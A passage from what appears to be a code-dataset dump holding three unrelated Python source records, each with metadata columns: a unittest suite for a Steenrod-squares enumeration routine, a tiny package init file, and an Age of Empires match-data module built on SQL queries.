self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #18
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[1],[2,1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #19
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[0,1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #20
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #21
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #22
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[2,0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #23
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[1,0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #24
self.assertEqual(stop, True)
if __name__ == '__main__':
unittest.main() | import sys, os
ksb_homology_path_list=os.path.dirname(os.path.realpath(__file__)).split("\\")[0:-2]
ksb_homology_path= "\\".join(ksb_homology_path_list)
if ksb_homology_path not in sys.path:
sys.path.append(ksb_homology_path)
import unittest
from ksb_homology.Ssquares import Ssquares
class SsquaresTest(unittest.TestCase):
def setUpIncreaseValues(top,bot):
uddot=sorted(set(top).difference(set(bot)))
n=len(uddot)
parallel=[[]]
remain=[[]]
circ=[uddot]
for l in range(1,n):
parallel.append(circ[0][0:l])
circ.append(circ[0][l:n])
remain.append([])
return [parallel,circ,remain]
def test_calculate_index(self):
return 1
'''def test_kth_steenrod_square(self):
X=BS.proyective_2planes_product_element()
S=((),(1))
sol=kth_steenrod_square( 2, X, S)
self.assertEqual(kth_steenrod_square( 2, X, S), ((0,1),(1)) )'''
def test_increase1(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[],[0],[0,1],[0,1,3]])
self.assertEqual(circ,[[0,1,2,3],[1,2,3],[2,3],[2]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase2(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [2]])
self.assertEqual(remain,[[],[],[],[3]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase3(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [3]])
self.assertEqual(remain,[[],[],[],[2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase4(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [3]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1) #algorithm sais 1
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
def test_increase5(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,3]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [1]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_complete_increase(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #1
self.assertEqual(parallel,[[],[0],[0,2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #2
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #3
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #4
self.assertEqual(parallel,[[],[1],[1,0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #5
self.assertEqual(parallel,[[],[1],[1,2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #6
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #7
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #8
self.assertEqual(parallel,[[],[2],[2,0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #9
self.assertEqual(parallel,[[],[2],[2,1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #10
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #11
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #12
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #13
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #14
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[1, 2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #15
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[0,2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #16
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #17
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #18
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[1],[2,1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #19
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[0,1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #20
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #21
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #22
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[0],[2,0]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #23
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[0],[1,0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #24
self.assertEqual(stop, True)
if __name__ == '__main__':
unittest.main() | en | 0.253714 | def test_kth_steenrod_square(self): X=BS.proyective_2planes_product_element() S=((),(1)) sol=kth_steenrod_square( 2, X, S) self.assertEqual(kth_steenrod_square( 2, X, S), ((0,1),(1)) ) #algorithm sais 1 #1 #2 #3 #4 #5 #6 #7 #8 #9 #10 #11 #12 #13 #14 #15 #16 #17 #18 #19 #20 #21 #22 #23 #24 | 2.341113 | 2 |
cse481wi18/perception/src/perception/__init__.py | TimAdamson21/access_teleop | 0 | 6612441 | <filename>cse481wi18/perception/src/perception/__init__.py
from .mock_camera import MockCamera
| <filename>cse481wi18/perception/src/perception/__init__.py
from .mock_camera import MockCamera
| none | 1 | 1.106079 | 1 | |
python/aocrecs/logic/matches.py | Rotzbua/aocrecs.com | 7 | 6612442 | """Matches."""
import asyncio
from aocrecs.cache import cached, dataloader_cached
from aocrecs.util import by_key, compound_where
@cached(ttl=None)
async def get_chat(database, match_id):
"""Get match chat."""
query = """
select name, player_number, message, origination, audience, timestamp, color_id
from chat join players on chat.player_number=players.number and chat.match_id=players.match_id
where chat.match_id=:match_id
order by id
"""
result = await database.fetch_all(query, values={'match_id': match_id})
return [dict(c, player=dict(
name=c['name'],
number=c['player_number'],
match_id=match_id,
color_id=c['color_id']
)) for c in result]
@dataloader_cached(ttl=None)
async def get_research_by_player(keys, context):
"""Get researches."""
where, values = compound_where(keys, ('match_id', 'player_number'))
query = """
select name, started::interval(0), finished::interval(0), player_number, match_id,
extract(epoch from started)::integer as started_secs, extract(epoch from finished)::integer as finished_secs
from research join technologies on research.technology_id=technologies.id and research.dataset_id=technologies.dataset_id
where {}
order by started
""".format(where)
results = await context.database.fetch_all(query, values=values)
return by_key(results, ('match_id', 'player_number'))
def make_players(player_data, match_id):
"""Make player structures."""
return [
dict(
player,
user=dict(
id=player['user_id'],
name=player['name'],
platform_id=player['platform_id'],
person=dict(
id=player['person_id'],
country=player['country'],
name=player['person_name']
) if player['person_id'] else None,
) if player['user_id'] else None,
civilization=dict(
id=player['civilization_id'],
name=player['civilization_name'],
dataset_id=player['dataset_id']
)
) for player in player_data[match_id]
]
def make_teams(player_data, match_id):
"""Make team structures."""
team_data = [
dict(
team_id=team_id,
winner=any([p['winner'] for p in team]),
players=team,
match_id=match_id
) for team_id, team in by_key(player_data, 'team_id').items()
]
winning_team = next((t for t in team_data if t['winner']), None)
return team_data, winning_team
def make_files(player_data, file_data, match_id):
"""Make files structures."""
by_number = by_key(player_data, 'number')
return [
dict(
file_,
download_link='/api/download/{}'.format(file_['id']),
owner=by_number[file_['owner_number']][0]
) for file_ in file_data[match_id]
]
@dataloader_cached(ttl=None)
async def get_player(keys, context):
"""Get basic player data."""
where, values = compound_where(keys, ('match_id', 'number'))
query = """
select
players.match_id, players.number, players.name, players.winner, players.color_id,
players.user_id, players.platform_id, players.user_name
from players
where {}
""".format(where)
results = await context.database.fetch_all(query, values=values)
return {(player['match_id'], player['number']): dict(
match_id=player['match_id'],
number=player['number'],
name=player['name'],
color_id=player['color_id'],
winner=player['winner'],
user=dict(
id=player['user_id'],
name=player['user_name'],
platform_id=player['platform_id']
)
) for player in results}
@dataloader_cached(ttl=None)
async def get_match(keys, context):
"""Get a match."""
player_query = """
select players.match_id, players.team_id, players.number, players.name, players.winner, teams.winner as t_winner,
player_colors.name as color, players.color_id,
civilizations.id as civilization_id, civilizations.name as civilization_name,
players.dataset_id, players.platform_id, players.user_id, players.user_name,
rate_snapshot, rate_before, rate_after, mvp, human, score, military_score,
economy_score, technology_score, society_score, units_killed, buildings_razed,
buildings_lost, units_converted, food_collected, wood_collected, stone_collected,
gold_collected, tribute_sent, tribute_received, trade_gold, relic_gold, units_lost,
feudal_time, castle_time, imperial_time,
extract(epoch from feudal_time)::integer as feudal_time_secs, extract(epoch from castle_time)::integer as castle_time_secs,
extract(epoch from imperial_time)::integer as imperial_time_secs, explored_percent, research_count,
total_wonders, total_castles, total_relics, villager_high,
people.id as person_id, people.country, people.name as person_name
from players join teams on players.team_id=teams.team_id and players.match_id=teams.match_id
join player_colors on players.color_id=player_colors.id
join civilizations on players.dataset_id=civilizations.dataset_id and players.civilization_id=civilizations.id
join datasets on players.dataset_id=datasets.id
left join platforms on players.platform_id=platforms.id
left join users on players.platform_id=users.platform_id and players.user_id=users.id
left join people on users.person_id=people.id
where players.match_id=any(:match_id)
"""
file_query = """
select id, match_id, size, original_filename, language, encoding, owner_number
from files where match_id=any(:match_id)
"""
match_query = """
select matches.id, map_name, rms_seed,
matches.dataset_id, datasets.name as dataset_name,
matches.platform_id, platforms.name as platform_name,
platforms.url as platform_url, platforms.match_url as platform_match_url,
matches.event_id, events.name as event_name,
matches.tournament_id, tournaments.name as tournament_name,
matches.series_id, series_metadata.name as series_name,
matches.ladder_id, ladders.name as ladder_name,
difficulties.name as difficulty,
game_types.name as type, matches.type_id,
map_reveal_choices.name as map_reveal_choice,
map_sizes.name as map_size,
speeds.name as speed,
starting_ages.name as starting_age,
starting_resources.name as starting_resources,
victory_conditions.name as victory_condition,
played, rated, diplomacy_type, team_size, platform_match_id,
cheats, population_limit, lock_teams, mirror, dataset_version, postgame, has_playback, duration::interval(0),
versions.name as version, extract(epoch from duration)::integer as duration_secs, winning_team_id,
game_version, save_version, build,
rms_seed, rms_custom, direct_placement, fixed_positions, guard_state, effect_quantity,
added
from matches
join versions on matches.version_id=versions.id
join datasets on matches.dataset_id=datasets.id
join difficulties on matches.difficulty_id=difficulties.id
join game_types on matches.type_id=game_types.id
join map_reveal_choices on matches.map_reveal_choice_id=map_reveal_choices.id
join map_sizes on matches.map_size_id=map_sizes.id
join speeds on matches.speed_id=speeds.id
left join platforms on matches.platform_id=platforms.id
left join starting_ages on matches.starting_age_id=starting_ages.id
left join starting_resources on matches.starting_resources_id=starting_resources.id
left join victory_conditions on matches.victory_condition_id=victory_conditions.id
left join ladders on matches.ladder_id=ladders.id and matches.platform_id=ladders.platform_id
left join events on matches.event_id=events.id
left join tournaments on matches.tournament_id=tournaments.id
left join series_metadata on matches.series_id=series_metadata.series_id
where matches.id=any(:id)
"""
matches, players, files = await asyncio.gather(
context.database.fetch_all(match_query, values={'id': keys}),
context.database.fetch_all(player_query, values={'match_id': keys}),
context.database.fetch_all(file_query, values={'match_id': keys})
)
output = {}
for match in matches:
match_id = match['id']
player_data = make_players(by_key(players, 'match_id'), match_id)
team_data, winning_team = make_teams(player_data, match_id)
output[match_id] = dict(
match,
players=player_data,
teams=team_data,
winning_team=winning_team,
minimap_link='/api/map/{}'.format(match_id),
event=dict(
id=match['event_id'],
name=match['event_name']
) if match['event_id'] else None,
tournament=dict(
id=match['tournament_id'],
name=match['tournament_name']
) if match['tournament_id'] else None,
series=dict(
id=match['series_id'],
name=match['series_name']
) if match['series_id'] else None,
files=make_files(player_data, by_key(files, 'match_id'), match_id),
dataset=dict(
id=match['dataset_id'],
name=match['dataset_name']
),
platform=dict(
id=match['platform_id'],
name=match['platform_name'],
url=match['platform_url'],
match_url=match['platform_match_url']
) if match['platform_id'] else None,
ladder=dict(
id=match['ladder_id'],
name=match['ladder_name'],
platform_id=match['platform_id']
) if match['ladder_id'] else None
)
return output
| """Matches."""
import asyncio
from aocrecs.cache import cached, dataloader_cached
from aocrecs.util import by_key, compound_where
@cached(ttl=None)
async def get_chat(database, match_id):
"""Get match chat."""
query = """
select name, player_number, message, origination, audience, timestamp, color_id
from chat join players on chat.player_number=players.number and chat.match_id=players.match_id
where chat.match_id=:match_id
order by id
"""
result = await database.fetch_all(query, values={'match_id': match_id})
return [dict(c, player=dict(
name=c['name'],
number=c['player_number'],
match_id=match_id,
color_id=c['color_id']
)) for c in result]
@dataloader_cached(ttl=None)
async def get_research_by_player(keys, context):
"""Get researches."""
where, values = compound_where(keys, ('match_id', 'player_number'))
query = """
select name, started::interval(0), finished::interval(0), player_number, match_id,
extract(epoch from started)::integer as started_secs, extract(epoch from finished)::integer as finished_secs
from research join technologies on research.technology_id=technologies.id and research.dataset_id=technologies.dataset_id
where {}
order by started
""".format(where)
results = await context.database.fetch_all(query, values=values)
return by_key(results, ('match_id', 'player_number'))
def make_players(player_data, match_id):
"""Make player structures."""
return [
dict(
player,
user=dict(
id=player['user_id'],
name=player['name'],
platform_id=player['platform_id'],
person=dict(
id=player['person_id'],
country=player['country'],
name=player['person_name']
) if player['person_id'] else None,
) if player['user_id'] else None,
civilization=dict(
id=player['civilization_id'],
name=player['civilization_name'],
dataset_id=player['dataset_id']
)
) for player in player_data[match_id]
]
def make_teams(player_data, match_id):
"""Make team structures."""
team_data = [
dict(
team_id=team_id,
winner=any([p['winner'] for p in team]),
players=team,
match_id=match_id
) for team_id, team in by_key(player_data, 'team_id').items()
]
winning_team = next((t for t in team_data if t['winner']), None)
return team_data, winning_team
def make_files(player_data, file_data, match_id):
"""Make files structures."""
by_number = by_key(player_data, 'number')
return [
dict(
file_,
download_link='/api/download/{}'.format(file_['id']),
owner=by_number[file_['owner_number']][0]
) for file_ in file_data[match_id]
]
@dataloader_cached(ttl=None)
async def get_player(keys, context):
"""Get basic player data."""
where, values = compound_where(keys, ('match_id', 'number'))
query = """
select
players.match_id, players.number, players.name, players.winner, players.color_id,
players.user_id, players.platform_id, players.user_name
from players
where {}
""".format(where)
results = await context.database.fetch_all(query, values=values)
return {(player['match_id'], player['number']): dict(
match_id=player['match_id'],
number=player['number'],
name=player['name'],
color_id=player['color_id'],
winner=player['winner'],
user=dict(
id=player['user_id'],
name=player['user_name'],
platform_id=player['platform_id']
)
) for player in results}
@dataloader_cached(ttl=None)
async def get_match(keys, context):
"""Get a match."""
player_query = """
select players.match_id, players.team_id, players.number, players.name, players.winner, teams.winner as t_winner,
player_colors.name as color, players.color_id,
civilizations.id as civilization_id, civilizations.name as civilization_name,
players.dataset_id, players.platform_id, players.user_id, players.user_name,
rate_snapshot, rate_before, rate_after, mvp, human, score, military_score,
economy_score, technology_score, society_score, units_killed, buildings_razed,
buildings_lost, units_converted, food_collected, wood_collected, stone_collected,
gold_collected, tribute_sent, tribute_received, trade_gold, relic_gold, units_lost,
feudal_time, castle_time, imperial_time,
extract(epoch from feudal_time)::integer as feudal_time_secs, extract(epoch from castle_time)::integer as castle_time_secs,
extract(epoch from imperial_time)::integer as imperial_time_secs, explored_percent, research_count,
total_wonders, total_castles, total_relics, villager_high,
people.id as person_id, people.country, people.name as person_name
from players join teams on players.team_id=teams.team_id and players.match_id=teams.match_id
join player_colors on players.color_id=player_colors.id
join civilizations on players.dataset_id=civilizations.dataset_id and players.civilization_id=civilizations.id
join datasets on players.dataset_id=datasets.id
left join platforms on players.platform_id=platforms.id
left join users on players.platform_id=users.platform_id and players.user_id=users.id
left join people on users.person_id=people.id
where players.match_id=any(:match_id)
"""
file_query = """
select id, match_id, size, original_filename, language, encoding, owner_number
from files where match_id=any(:match_id)
"""
match_query = """
select matches.id, map_name, rms_seed,
matches.dataset_id, datasets.name as dataset_name,
matches.platform_id, platforms.name as platform_name,
platforms.url as platform_url, platforms.match_url as platform_match_url,
matches.event_id, events.name as event_name,
matches.tournament_id, tournaments.name as tournament_name,
matches.series_id, series_metadata.name as series_name,
matches.ladder_id, ladders.name as ladder_name,
difficulties.name as difficulty,
game_types.name as type, matches.type_id,
map_reveal_choices.name as map_reveal_choice,
map_sizes.name as map_size,
speeds.name as speed,
starting_ages.name as starting_age,
starting_resources.name as starting_resources,
victory_conditions.name as victory_condition,
played, rated, diplomacy_type, team_size, platform_match_id,
cheats, population_limit, lock_teams, mirror, dataset_version, postgame, has_playback, duration::interval(0),
versions.name as version, extract(epoch from duration)::integer as duration_secs, winning_team_id,
game_version, save_version, build,
rms_seed, rms_custom, direct_placement, fixed_positions, guard_state, effect_quantity,
added
from matches
join versions on matches.version_id=versions.id
join datasets on matches.dataset_id=datasets.id
join difficulties on matches.difficulty_id=difficulties.id
join game_types on matches.type_id=game_types.id
join map_reveal_choices on matches.map_reveal_choice_id=map_reveal_choices.id
join map_sizes on matches.map_size_id=map_sizes.id
join speeds on matches.speed_id=speeds.id
left join platforms on matches.platform_id=platforms.id
left join starting_ages on matches.starting_age_id=starting_ages.id
left join starting_resources on matches.starting_resources_id=starting_resources.id
left join victory_conditions on matches.victory_condition_id=victory_conditions.id
left join ladders on matches.ladder_id=ladders.id and matches.platform_id=ladders.platform_id
left join events on matches.event_id=events.id
left join tournaments on matches.tournament_id=tournaments.id
left join series_metadata on matches.series_id=series_metadata.series_id
where matches.id=any(:id)
"""
matches, players, files = await asyncio.gather(
context.database.fetch_all(match_query, values={'id': keys}),
context.database.fetch_all(player_query, values={'match_id': keys}),
context.database.fetch_all(file_query, values={'match_id': keys})
)
output = {}
for match in matches:
match_id = match['id']
player_data = make_players(by_key(players, 'match_id'), match_id)
team_data, winning_team = make_teams(player_data, match_id)
output[match_id] = dict(
match,
players=player_data,
teams=team_data,
winning_team=winning_team,
minimap_link='/api/map/{}'.format(match_id),
event=dict(
id=match['event_id'],
name=match['event_name']
) if match['event_id'] else None,
tournament=dict(
id=match['tournament_id'],
name=match['tournament_name']
) if match['tournament_id'] else None,
series=dict(
id=match['series_id'],
name=match['series_name']
) if match['series_id'] else None,
files=make_files(player_data, by_key(files, 'match_id'), match_id),
dataset=dict(
id=match['dataset_id'],
name=match['dataset_name']
),
platform=dict(
id=match['platform_id'],
name=match['platform_name'],
url=match['platform_url'],
match_url=match['platform_match_url']
) if match['platform_id'] else None,
ladder=dict(
id=match['ladder_id'],
name=match['ladder_name'],
platform_id=match['platform_id']
) if match['ladder_id'] else None
)
return output
| en | 0.756861 | Matches. Get match chat. select name, player_number, message, origination, audience, timestamp, color_id from chat join players on chat.player_number=players.number and chat.match_id=players.match_id where chat.match_id=:match_id order by id Get researches. select name, started::interval(0), finished::interval(0), player_number, match_id, extract(epoch from started)::integer as started_secs, extract(epoch from finished)::integer as finished_secs from research join technologies on research.technology_id=technologies.id and research.dataset_id=technologies.dataset_id where {} order by started Make player structures. Make team structures. Make files structures. Get basic player data. select players.match_id, players.number, players.name, players.winner, players.color_id, players.user_id, players.platform_id, players.user_name from players where {} Get a match. select players.match_id, players.team_id, players.number, players.name, players.winner, teams.winner as t_winner, player_colors.name as color, players.color_id, civilizations.id as civilization_id, civilizations.name as civilization_name, players.dataset_id, players.platform_id, players.user_id, players.user_name, rate_snapshot, rate_before, rate_after, mvp, human, score, military_score, economy_score, technology_score, society_score, units_killed, buildings_razed, buildings_lost, units_converted, food_collected, wood_collected, stone_collected, gold_collected, tribute_sent, tribute_received, trade_gold, relic_gold, units_lost, feudal_time, castle_time, imperial_time, extract(epoch from feudal_time)::integer as feudal_time_secs, extract(epoch from castle_time)::integer as castle_time_secs, extract(epoch from imperial_time)::integer as imperial_time_secs, explored_percent, research_count, total_wonders, total_castles, total_relics, villager_high, people.id as person_id, people.country, people.name as person_name from players join teams on players.team_id=teams.team_id and players.match_id=teams.match_id join player_colors on players.color_id=player_colors.id join civilizations on players.dataset_id=civilizations.dataset_id and players.civilization_id=civilizations.id join datasets on players.dataset_id=datasets.id left join platforms on players.platform_id=platforms.id left join users on players.platform_id=users.platform_id and players.user_id=users.id left join people on users.person_id=people.id where players.match_id=any(:match_id) select id, match_id, size, original_filename, language, encoding, owner_number from files where match_id=any(:match_id) select matches.id, map_name, rms_seed, matches.dataset_id, datasets.name as dataset_name, matches.platform_id, platforms.name as platform_name, platforms.url as platform_url, platforms.match_url as platform_match_url, matches.event_id, events.name as event_name, matches.tournament_id, tournaments.name as tournament_name, matches.series_id, series_metadata.name as series_name, matches.ladder_id, ladders.name as ladder_name, 